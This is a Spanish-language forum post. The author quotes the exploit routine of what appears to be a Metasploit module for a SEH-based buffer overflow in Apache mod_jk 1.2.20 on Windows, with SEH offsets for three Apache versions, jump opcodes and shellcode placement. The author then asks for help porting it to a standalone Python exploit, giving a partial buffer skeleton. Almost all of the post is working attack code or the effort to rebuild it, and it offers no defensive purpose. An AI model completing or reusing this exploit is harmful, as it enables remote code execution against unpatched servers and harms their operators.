Buenas, aquí esta el codigo:
http://www.exploit-db.com/exploits/16798/ (http://www.exploit-db.com/exploits/16798/)
Mi duda es esta
def exploit
connect
uri_start = "GET /"
uri_end = ".html HTTP/1.0\r\n\r\n"
sc_base = 16
shellcode = payload.encoded
sploit = rand_text_alphanumeric(5001)
sploit[sc_base, shellcode.length] = shellcode
# 4343 : Apache/1.3.37 (Win32) mod_jk/1.2.20
# 4407 : Apache/2.0.59 (Win32) mod_jk/1.2.20
# 4423 : Apache/2.2.3 (Win32) mod_jk/1.2.20
[ 4343, 4407, 4423 ].each { |seh_offset|
sploit[seh_offset - 9, 5] = "\xe9" + [sc_base - seh_offset + 4].pack('V')
sploit[seh_offset - 4, 2] = "\xeb\xf9"
sploit[seh_offset , 4] = [ target.ret ].pack('V')
}
Estoy tratando de pasarlo a python, las líneas que no se interpretar son las siguientes:
sploit[sc_base, shellcode.length] = shellcode
sploit[seh_offset - 9, 5] = "\xe9" + [sc_base - seh_offset + 4].pack('V')
sploit[seh_offset - 4, 2] = "\xeb\xf9"
sploit[seh_offset , 4] = [ target.ret ].pack('V')
Como seguirías este buffer?
Buffer = "GET /"
Buffer += '\x41' * 5001
Buffer += ????
Buffer += ????
[...]
Buffer += ".html HTTP/1.0\r\n\r\n"
Gracias chicos!!